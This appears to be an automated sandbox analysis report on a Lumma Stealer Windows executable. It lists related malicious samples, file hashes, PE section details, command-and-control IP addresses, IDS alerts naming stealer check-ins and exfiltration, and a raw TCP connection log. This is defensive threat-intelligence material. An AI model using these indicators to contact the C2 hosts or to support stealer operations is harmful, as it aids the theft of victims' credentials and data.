                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              CLOUDFLARENETUSiaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.36.201
                                                                                                                                              ElmEHL9kP9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.36.201
                                                                                                                                              yO9EAqDV15.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              singl6.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.37.173
                                                                                                                                              HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                              • 172.67.177.134
                                                                                                                                              eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                              • 172.67.169.205
                                                                                                                                              qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.195.241
                                                                                                                                              txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.151.61
                                                                                                                                              AMAZON-02USiaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.50
                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 185.166.143.50
                                                                                                                                              sh4.nn.elfGet hashmaliciousOkiruBrowse
                                                                                                                                              • 54.171.230.55
                                                                                                                                              mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                                                                                              • 54.171.230.55
                                                                                                                                              armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 35.163.11.216
                                                                                                                                              splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 3.138.165.134
                                                                                                                                              nklarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 3.115.112.216
                                                                                                                                              splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 3.116.167.193
                                                                                                                                              nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 18.183.83.81
                                                                                                                                              jklspc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 3.110.151.242
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              4W3cB5WEYH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              ElmEHL9kP9.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              yO9EAqDV15.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              singl6.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.199.72
                                                                                                                                              • 185.166.143.48
                                                                                                                                              • 16.15.177.52
                                                                                                                                              No context
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65536
                                                                                                                                              Entropy (8bit):1.0460930282230434
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:n54Miwkkt3k0BU/nAhAyjudxhYfzuiFpZ24IO87uAq:iMttvBU/nU5jjzuiFpY4IO8qf
                                                                                                                                              MD5:149608CB82F9DF5BAC3B426AB523B056
                                                                                                                                              SHA1:0182AB5273763D1C85FE1B3BC02F3115A0B84EBD
                                                                                                                                              SHA-256:3F6F72CBBAB62D0374E2F041FF0355137F64E7D2DEFD7A87F88D3851BCB13790
                                                                                                                                              SHA-512:F9B46730D5B2085EA41928EDCE83FFAB23AB84566932F8A7559E22A1335C54790C5C30A7A650B49BB5D3D7B2E9F82B270365BE905163A1C79E5C2B2C3D1C7252
                                                                                                                                              Malicious:true
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.0.4.4.3.9.0.8.6.7.8.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.0.4.4.4.0.0.3.9.9.0.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.5.5.f.4.5.d.-.d.8.2.9.-.4.8.5.3.-.8.b.a.8.-.d.a.a.e.2.8.b.f.8.8.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.0.6.5.1.8.4.-.e.e.2.3.-.4.f.4.3.-.8.b.3.0.-.c.e.7.f.7.3.9.f.8.3.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.T.G.x.Y.W.t.j.G.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.a.8.-.0.0.0.1.-.0.0.1.4.-.b.d.4.8.-.e.5.8.0.d.8.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.5.7.d.9.0.7.f.f.f.6.3.2.7.a.0.2.7.c.2.3.2.4.d.6.3.f.1.c.2.c.e.0.0.0.0.f.f.f.f.!.0.0.0.0.d.8.4.9.d.e.b.5.f.2.b.5.3.0.a.e.7.3.d.b.f.f.0.4.2.5.c.3.c.1.5.8.0.0.2.3.b.2.8.4.!.t.T.G.x.Y.W.t.j.G.5...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Tue Dec 24 09:00:39 2024, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):282526
                                                                                                                                              Entropy (8bit):1.5205636445835293
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:6Zy/WIGXKtG3BcgzGSI5M6FJSg0J9Tl0k8Yd9PYCz:Ky/WFXKtG3BcgzzI5M6FJSg02L6
                                                                                                                                              MD5:8DC36E150C53BC69A4F57334DBD2837C
                                                                                                                                              SHA1:02BDF77A966188B94A706F33865BE42353899E0E
                                                                                                                                              SHA-256:7DDA01AC28844ED48A67E98343DABB5631C59A9C5441A48A81F518A35B96BAC4
                                                                                                                                              SHA-512:803966F65841B6A5D270FA7512A908BCDAC976BA073621BF4DB2BB52B1C5C4093DD1BF694502D70A3BF36B3DE96C565DF32B61BD28F65DB5D332968448CAB8F5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:MDMP..a..... .......7xjg....................................,....'......................`.......8...........T............K...............(...........*..............................................................................eJ......H+......GenuineIntel............T............gjg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8384
                                                                                                                                              Entropy (8bit):3.707158024374477
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:R6l7wVeJ+pz6z6YN4SUgDgmfJmFprE89bQ2sftQm:R6lXJq6z6YCSUgDgmf0pQVfv
                                                                                                                                              MD5:7C48A15A6F1D2DF776304AF12DC6ED8A
                                                                                                                                              SHA1:6AAB7793071252D8F37B682A5C87EA6DB681B9C8
                                                                                                                                              SHA-256:61B7D0E86EC96BD2884455A40D18EF6A45D5E6E31A738A7364B0B2213FDEDF0F
                                                                                                                                              SHA-512:B6F02AAB12D84E0281407EE5C81F65ED4385B71F23ACF24F51A0083F9DDB83CCC6C05303FDBFAA69B81057DE9396E0EE379825919497E5EF39CED1907934621E
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.2.4.<./.P.i.d.
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4624
                                                                                                                                              Entropy (8bit):4.517193274217069
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwWl8zsFJg77aI9vUWpW8VYkYm8M4JoCLxFNNu+q8h9GG8wT6MpMMd:uIjffI7JN7VIJntNu8EGlT6MpMMd
                                                                                                                                              MD5:3E82D3111B28BFFA1C2BE906DF42C3D1
                                                                                                                                              SHA1:FFA64EC417ABC242D33EBFC8B6BF6021AD948EE0
                                                                                                                                              SHA-256:C1407C77E9D906CC478EAE0723BEF3B33DE03CB40D96EF01D519C146F9628642
                                                                                                                                              SHA-512:53D0A303C02FF0C4FD9EB592D68EAA71E7F046F65BE2662D782EB756BC3696648453E41AF2FDDB0DBC5E260CD7A62B1F4CE2383DC9D127B024E1A5BA80A7FCDE
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="645123" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1835008
                                                                                                                                              Entropy (8bit):4.416697001513043
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:ocifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNg5+I:di58oSWIZBk2MM6AFBaoI
                                                                                                                                              MD5:DD851CE1B42ECCBA346D110A2A32588E
                                                                                                                                              SHA1:B53C2D70F64E18D15EAD3C152FB02445B2042DC0
                                                                                                                                              SHA-256:D5439C457DAEF008E216EFD3F28DD1BDC728C1550DA87E069ABDE6E0A9DB88E6
                                                                                                                                              SHA-512:2F3FA0EB05D65619A1257E4C4B5954001686F2C6098756F8C272EB9CCB25630A05542B526D0860F6F12CB77B2578418F95B7D23215FD9EF155F707AAE1E8958D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.:.M.U..............................................................................................................................................................................................................................................................................................................................................R..y........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                              Entropy (8bit):6.553348608442792
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                              File name:tTGxYWtjG5.exe
                                                                                                                                              File size:2'963'968 bytes
                                                                                                                                              MD5:6e0e190ce94e8017d60243ed97725433
                                                                                                                                              SHA1:d849deb5f2b530ae73dbff0425c3c1580023b284
                                                                                                                                              SHA256:2e664bc54aa4050db04b9c39dbd3acdbeda05049ecf4a4642ba6bd3cb28aaef3
                                                                                                                                              SHA512:292fbb3fa36b004019b889498c0884e720814a31a46eb61a3bc53a531122f00c47451e4d1b3a698772854e2ea72277a0c270797586568aa5520ab1636fe5b057
                                                                                                                                              SSDEEP:49152:JI0pRMd/GJNXOJT1I6Av+M+uQkxK2vxsRR1No9DK:O0pRMd/GJNXOH82MPNKis3Po9u
                                                                                                                                              TLSH:FBD53BA2E84575CFD4CE17F8912BCD49592D03B88B2825D7EC9CB879AE73CC112B6D24
                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................0...........@..........................00.....Z.-...@.................................Y@..m..
                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                              Entrypoint:0x700000
                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                              Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:6
                                                                                                                                              OS Version Minor:0
                                                                                                                                              File Version Major:6
                                                                                                                                              File Version Minor:0
                                                                                                                                              Subsystem Version Major:6
                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                              Instruction
                                                                                                                                              jmp 00007F2A908192BAh
                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x540590x6d.idata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x541f80x8.idata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              0x10000x520000x2640091e8a45a923cd8d4bcff6ab1cd54698bFalse0.9995404411764706data7.985601897033366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .rsrc 0x530000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .idata 0x540000x10000x20039a711a7d804ccbc2a14eea65cf3c27eFalse0.154296875data1.0789976601211375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              zwpmlftu0x550000x2aa0000x2a9e00b82bab5671fc7a5a06d51cfa17cfaf8eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              dupzvwvc0x2ff0000x10000x40099ea3a1e67acd6d947394f0e4e780b1fFalse0.6953125data5.623835797908159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .taggant0x3000000x30000x2200245d31188dd4112322d1de2b625142dcFalse0.072265625DOS executable (COM)0.7404150606360891IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              DLLImport
                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                              2024-12-24T08:50:36.751774+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:37.858563+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749700172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:37.858563+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:39.107570+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:39.879144+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749701172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:39.879144+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:41.644366+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:42.654775+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749703172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:44.014207+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749709172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:46.387851+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749715172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:49.316664+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749721172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:53.077105+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749735172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:57.960121+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749746172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:50:58.745276+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749746172.67.199.72443TCP
                                                                                                                                              2024-12-24T08:51:00.502738+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749752185.166.143.48443TCP
                                                                                                                                              2024-12-24T08:51:03.017871+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74975816.15.177.52443TCP
                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Dec 24, 2024 08:50:35.528085947 CET49700443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:35.528186083 CET44349700172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:35.528439999 CET49700443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:35.534255981 CET49700443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:35.534286976 CET44349700172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:36.751494884 CET44349700172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:36.751774073 CET49700443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:36.814940929 CET49700443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:36.815016031 CET44349700172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:36.815267086 CET44349700172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:36.855365992 CET49700443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:37.110166073 CET49700443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:37.110167027 CET49700443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:37.110361099 CET44349700172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:37.858582973 CET44349700172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:37.858686924 CET44349700172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:37.858756065 CET49700443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:37.865449905 CET49700443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:37.865474939 CET44349700172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:37.892052889 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:37.892169952 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:37.892251015 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:37.892560959 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:37.892597914 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.107423067 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.107569933 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:39.108902931 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:39.108931065 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.109181881 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.110481024 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:39.110522032 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:39.110574007 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.879139900 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.879491091 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.879520893 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.879570007 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.879597902 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:39.879640102 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.879669905 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:39.890944958 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.891011000 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:39.891032934 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.899514914 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.899584055 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:39.899610043 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.949002981 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:39.949026108 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:39.996004105 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:39.998541117 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:40.043354988 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:40.043375015 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:40.075004101 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:40.075064898 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:40.075067997 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:40.075087070 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:40.075141907 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:40.075158119 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:40.075191021 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:40.075247049 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:40.075383902 CET49701443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:40.075418949 CET44349701172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:40.430608034 CET49703443192.168.2.7172.67.199.72
                                                                                                                                              Dec 24, 2024 08:50:40.430644989 CET44349703172.67.199.72192.168.2.7
                                                                                                                                              Dec 24, 2024 08:50:40.430712938 CET49703443192.168.2.7172.67.199.72
